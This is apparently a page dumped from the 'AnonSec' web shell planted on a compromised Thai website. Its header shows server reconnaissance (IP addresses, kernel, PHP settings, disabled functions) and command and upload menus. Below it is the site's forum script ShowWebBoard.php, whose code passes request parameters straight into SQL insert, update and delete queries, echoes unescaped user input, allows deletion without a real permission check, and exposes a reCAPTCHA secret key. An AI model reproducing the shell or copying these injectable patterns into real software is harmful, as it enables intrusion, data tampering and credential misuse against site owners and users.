AnonSec Team

Server IP : 124.109.2.77 / Your IP : 216.73.216.49
Web Server : Apache/2
System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : cpctlp ( 1020)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON | cURL : ON | WGET :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329
OFF | Perl :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335
OFF | Python :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341
OFF
Directory (0755) : /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/../tcpdf/../src/../../

[ Home ]	[ C0mmand ]	[ Upload File ]

Current File : /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/../tcpdf/../src/../../ShowWebBoard.php

<?php 
session_start();
header('Content-Type: text/plain; charset=utf-8');
header('Content-Type: text/html; charset=utf-8');
//กำหนดให้ IE อ่าน page นี้ทุกครั้ง ไม่ไปเอาจาก cache
header ("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header ("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header ("Cache-Control: no-cache, must-revalidate");
header ("Pragma: no-cache");
include ("Connections/config.php");
 ?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="keywords" content="<?php  echo $config[web_keywords];?>" />
<meta name="description" content="<?php  echo $config[web_description];?>" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
<link rel="shortcut icon" href="images/<?php  echo $config[web_icon];?>" />
<link href="https://fonts.googleapis.com/css?family=Kanit" rel="stylesheet">
<style type="text/css">
body {
font-family: 'Kanit', sans-serif;
background-image: url("images/bg2.jpg");
}
</style>
<!-- favicon icon -->
<link rel="shortcut icon" href="images/<?php  echo $config[web_icon];?>" />

<!-- bootstrap -->
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"/>

<!-- animate -->
<link rel="stylesheet" type="text/css" href="css/animate.css"/>

<!-- owl-carousel -->
<link rel="stylesheet" type="text/css" href="css/owl.carousel.css">

<!-- fontawesome -->
<link rel="stylesheet" type="text/css" href="css/font-awesome.css"/>

<!-- themify -->
<link rel="stylesheet" type="text/css" href="css/themify-icons.css"/>

<!-- flaticon -->
<link rel="stylesheet" type="text/css" href="css/flaticon.css"/>


<!-- REVOLUTION LAYERS STYLES -->

    <link rel="stylesheet" type="text/css" href="revolution/css/rs6.css">

<!-- prettyphoto -->
<link rel="stylesheet" type="text/css" href="css/prettyPhoto.css">

<!-- shortcodes -->
<link rel="stylesheet" type="text/css" href="css/shortcodes.css"/>

<!-- main -->
<link rel="stylesheet" type="text/css" href="css/main.css"/>

<!-- responsive -->
<link rel="stylesheet" type="text/css" href="css/responsive.css"/>

 <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"  integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"/>

<!-- font -->
<link href="https://fonts.googleapis.com/css?family=Kanit" rel="stylesheet">
<style type="text/css">
	body {
		font-family: 'Kanit', sans-serif;
		font-size: 14px;
	}
</style>
<!-- font -->
<script src='https://www.google.com/recaptcha/api.js'></script>

 <?php
include ("Connections/function-sys.php");
$sql="select  banner_header.* from banner_header order by aID desc   ";
$arr=$db->getRec($sql);		
$header=$arr[Img1];
 $aID=substr($_REQUEST[id],5,strlen($_REQUEST[id])-5);
$uniqid=substr($_REQUEST[id],0,5);
?>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" >
<!-- Save for Web Slices (index.psd) -->
<CENTER><table  style="width:90%;max-width: 1200px;"  border="0" align="center" cellpadding="0" cellspacing="0" id="Table_01">
	<tr>
		<td   bgcolor="#FFFFFF"><IMG SRC="admin/slidecenter/picslide/<?php echo $header;?>"  style="width:100%;max-width: 1200px;" BORDER="0" ></td>
	</tr>
	<tr>
		<td  valign="top" bgcolor="#FFFFFF" align="center"><BR>
			<!-- Contents -->
  
			<?php
			switch($_REQUEST[action]){
				case "ansBoard":
							// ตรวจสอบเมื่อกดปุ่ม และเมื่อส่งค่า  g-recaptcha-response มาตรวจสอบ
							if(isset($_POST['btn_submit']) && isset($_POST['g-recaptcha-response'])){
								$recaptcha_secret = "6LcbtHMcAAAAAGNR14WDuU-oqplrH3bCDjG_ymLI";
								$recaptcha_response = trim($_POST['g-recaptcha-response']);
								$recaptcha_remote_ip = $_SERVER['REMOTE_ADDR'];
								 
								$recaptcha_api = "https://www.google.com/recaptcha/api/siteverify?".
									http_build_query(array(
										'secret'=>$recaptcha_secret,
										'response'=>$recaptcha_response,
										'remoteip'=>$recaptcha_remote_ip
									)
								);
								$response=json_decode(file_get_contents($recaptcha_api), true);        

							}
							if(isset($response) && $response['success'] == true){ // ตรวจสอบสำเร็จ 
								$sql="insert into ansboard (ansDesc,ansDate,aID,ansFrom,ansEmail,statusID) values
										('$_REQUEST[ansDesc]',now(),'$_REQUEST[aID]','$_REQUEST[ansFrom]','$_REQUEST[ansEmail]','1')";
 								$db->query($sql);
								$msg="ส่งข้อมูลเรียบร้อยแล้ว!";
							}else
							{
								$msg="กรุณาเช็คฉันไม่ใช่โปรแกรมอัตโนมัติ!";
							}
							echo "<div align=center><strong>$msg</strong></div>";
						   echo "<BR><BR><META HTTP-EQUIV=\"REFRESH\" CONTENT=\"1; URL=$_SERVER[PHP_SELF]?id=$_REQUEST[uniqid]$_REQUEST[aID]\">";

							break;
				
				case "del4Data" :
						$sql="delete from ansboard  where ansID='$_REQUEST[ansID]' ";
						$db->query($sql);
						$msg="ลบข้อมูลเรียบร้อยแล้ว!";
						echo "<div align=center><strong>$msg</strong></div>";
						echo "<BR><BR><META HTTP-EQUIV=\"REFRESH\" CONTENT=\"1; URL=$_SERVER[PHP_SELF]?id=$_REQUEST[id]\">";
						break;
 
				default :
				$sql2="update board set aOpen=aOpen+1 where aID='$aID'  and board.uniqid='$uniqid' ";
				$db->query($sql2);

				$sql="select  board.* from board 	where aID='$aID'  and board.uniqid='$uniqid' ";
				$arrE=$db->getRec($sql);		
				$aOpen=$arrE[aOpen];
				
				
 				$arrE[aFile]=trim($arrE[aFile]);
 				if(!empty($arrE[aFile])){
					$File=explode(".",$arrE[aFile]);
					if(strtolower($File[1])=="pdf"){
						$aFile="<embed src=\"admin/images/board/$arrE[aFile]\" type=\"application/pdf\"   height=\"750px\" width=\"100%\">";
					}
					if(strtolower($File[1])=="jpg" or strtolower($File[1])=="png" or strtolower($File[1])=="gif" or strtolower($File[1])=="pjpeg"){
 						$aFile="<CENTER>
									<A HREF=\"admin/images/board/$arrE[aImg]\" target=doc><IMG SRC=\"admin/images/board/$arrE[aFile]\"   BORDER=0  class=\"img-rounded\" style=\"width:90%\"></A>
									</CENTER>";
					}
					if(strtolower($File[1])!="pdf" and strtolower($File[1])!="jpg" and strtolower($File[1])!="png" and strtolower($File[1])!="gif" and strtolower($File[1])!="pjpeg"){ 
						$aFile="<BR><BR><CENTER><A HREF=\"admin/images/board/$arrE[aFile]\" target=doc><IMG SRC=\"admin/images/icons/cloud-download.png\" WIDTH=\"62\" \ BORDER=\"0\"><BR>ดาวน์โหลดเอกสาร</A></CENTER>";
					}
					
				}

				if(!empty($arrE[aUrl])){
					$aLink="<BR><BR><CENTER><A HREF=\"$arrE[aUrl]\" target=doc><IMG SRC=\"admin/images/icons/cloud_board-512.png\" WIDTH=\"62\" \ BORDER=\"0\"><BR>ลิงค์ข้อมูลเพิ่มเติม</A></CENTER>";
				}

				$arrE[ansFile]=trim($arrE[ansFile]);
 				if(!empty($arrE[ansFile])){
					$File=explode(".",$arrE[ansFile]);
					if(strtolower($File[1])=="pdf"){
						$ansFile="<embed src=\"admin/images/board/$arrE[ansFile]\" type=\"application/pdf\"   height=\"750px\" width=\"100%\">";
					}
					if(strtolower($File[1])=="jpg" or strtolower($File[1])=="png" or strtolower($File[1])=="gif" or strtolower($File[1])=="pjpeg"){
 						$ansFile="<CENTER>
									<A HREF=\"admin/images/board/$arrE[ansFile]\" target=doc><IMG SRC=\"admin/images/board/$arrE[ansFile]\"   BORDER=0  class=\"img-rounded\" style=\"width:90%\"></A>
									</CENTER>";
					}
					if(strtolower($File[1])!="pdf" and strtolower($File[1])!="jpg" and strtolower($File[1])!="png" and strtolower($File[1])!="gif" and strtolower($File[1])!="pjpeg"){ 
						$ansFile="<BR><BR><CENTER><A HREF=\"admin/images/board/$arrE[ansFile]\" target=doc><IMG SRC=\"admin/images/icons/cloud-download.png\" WIDTH=\"62\" \ BORDER=\"0\"><BR>ดาวน์โหลดเอกสาร</A></CENTER>";
					}
					
				}

				if(!empty($arrE[ansUrl])){
					$ansUrl="<BR><BR><CENTER><A HREF=\"$arrE[ansUrl]\" target=doc><IMG SRC=\"admin/images/icons/cloud_board-512.png\" WIDTH=\"62\" \ BORDER=\"0\"><BR>ลิงค์ข้อมูลเพิ่มเติม</A></CENTER>";
				}

				$arrE[aTitle]=htmlspecialchars_decode($arrE[aTitle], ENT_QUOTES);
				$arrE[aDesc]=htmlspecialchars_decode($arrE[aDesc], ENT_QUOTES);
				$arrE[aDate]="วันที่ ".ShowAllDate($arrE[aDate],2)." เวลา".substr($arrE[aDate],10,10)." น.";
 				$arrE[ansDesc]=htmlspecialchars_decode($arrE[ansDesc], ENT_QUOTES);
				if(!empty(ShowAllDate($arrE[ansDate],2))){$arrE[ansDate]="วันที่ ".ShowAllDate($arrE[ansDate],2)." เวลา".substr($arrE[ansDate],10,10)." น.";}
			echo <<<DOC
			<table width="97%" border="0" align="center" cellpadding="0" cellspacing="0">
			<tr>
				<td align=right style="font-size:12px;">อ่านแล้ว $aOpen ครั้ง</td>
			</tr>
			</table><BR>

			<table class="table" style="width:95%"  align="center" >
 			<tr  bgcolor="#CCFFCC">
				<TD style="font-size:14px;"> <strong>$arrE[aTitle]</strong></TD>
			</TR>
			<tr>
				<TD style="font-size:14px;">
					$arrE[aDesc]   $aFile  $aLink <BR><BR>
					 <span class="pull-right"style="color:#999999;font-size: 12px;">โดย:$arrE[aFrom]<BR>$arrE[aDate]</span><BR>
				</TD>
			</TR>
			</table><BR>
DOC;

			$sql ="select  *  from ansboard  where aID='$aID'    order by ansID DESC";
			$row=$db->recCount($sql);
			if($row!=0){
				echo <<<DOC
				<table class="table" style="width:95%"  align="center" >
DOC;
				foreach ($db->dbSearch($sql) as $i=>$arr) {
				$j=$i+1;
				$arr[ansDate]="วันที่".ShowAllDate($arr[ansDate],1)." เวลา ".substr($arr[ansDate],10,10)." น.";
				if(!empty($_SESSION[User_id])){ 
					$Del= <<<DOC
							<div class="pull-right"style="color:#999999"><A HREF="$_SERVER[PHP_SELF]?action=del4Data&ansID=$arr[ansID]&id=$uniqid$aID" onClick="return confirm('คุณต้องการลบคำตอบ $arr[ansFrom]?');">
							<button type="button" class="btn btn-danger btn-xs" ><span class="glyphicon glyphicon-trash"></span>ลบความคิดเห็น</button></A></div>
DOC;
			}
				echo <<<DOC
				<tr  bgcolor="#CCFFCC">
					<TD style="font-size:14px;">ความคิดเห็นที่ $j $Del</TD>
  				</TR>
				<tr>
					<TD style="font-size:14px;">
						$arr[ansDesc] <BR><BR>
						 <span class="pull-right"style="color:#999999;font-size: 12px;">โดย $arr[ansFrom]<BR> อีเมล $arr[ansEmail]<BR>$arr[ansDate]</span><BR>
					</TD>
				</TR>
DOC;
			}
			echo <<<DOC
			<TR><TD colspan=3><BR></TD></TR>
			<TR><TD colspan=3>
			</TD></TR>
 			</table>
DOC;
			}//ปิดพบคำตอบ
 		  ?>
		  <TABLE  class="table" style="width:95%"  align="center" >
		  <tr  bgcolor="#FFFFCC">
				<TD style="font-size:14px;">แสดงความคิดเห็น</TD>
			</TR>
		<TR>
			<TD><form id="AnsAssignForm" method="post" action="<?php echo $_SERVER[PHP_SELF];?>" class="form-horizontal pull-center" enctype="multipart/form-data"  >
		  <div class="col-lg-12">
				<div class="form-group">
					<label class="col-lg-2 control-label">ชื่อ-สกุล</label>
					<div class="col-lg-5">
						<input type="text" class="form-control" name="ansFrom" placeholder=""  value="" />
					</div>
				</div>

				<div class="form-group">
					<label class="col-lg-2 control-label">อีเมล</label>
					<div class="col-lg-5">
						<input type="text" class="form-control" name="ansEmail" placeholder=""  value="" />
					</div>
				</div>

				<div class="form-group">
				<label class="col-lg-2 control-label">ความคิดเห็น</label>
				<div class="col-lg-10">
					<textarea name="ansDesc" id="ansDesc" class="form-control"  style="width:100%" rows=5></textarea>
 				</div>
			</div>
			
 			<div class="form-group">
				<label class="col-lg-2 control-label"></label>
				<div class="col-lg-10">
					<script>
					  function makeaction(){
					        document.getElementById('btn_submit').disabled = false;  
					  }
					  </script>
					  <div class="g-recaptcha" data-callback="makeaction" data-sitekey="6LcbtHMcAAAAAEQ-gYkLO4b_iMaS-YuOh_MdsR54"></div>
				</div>
			</div>  
 
			<div class="form-group">
				<div class="col-lg-11 col-lg-offset-2">
					<button type="submit" id="btn_submit" name="btn_submit"  class="btn btn-primary" disabled>ส่งคำถาม</button><!-- disabled -->
					<button type="reset" class="btn btn-primary">ยกเลิก</button>
					<INPUT TYPE="hidden" NAME="action" value="ansBoard">
					<INPUT TYPE="hidden" NAME="aID" value="<?php echo $aID;?>">
					<INPUT TYPE="hidden" NAME="uniqid" value="<?php echo $uniqid;?>">

				</div>
			</div>

		</div>
		<!-- <div class="col-lg-12">-->
		</form></TD>
		</TR>
		</TABLE>
		<?php
			break;
		}//ปิด switch?>
		  <!-- Contents -->
			<p>&nbsp;</p>
	  <p>&nbsp;</p></td>
 
	</tr> 
	 <tr>
		<td    bgcolor="#003399"><BR></td>
	</tr>
</table></CENTER>
<!-- End Save for Web Slices -->
 </body>
</html>

AnonSec - 2021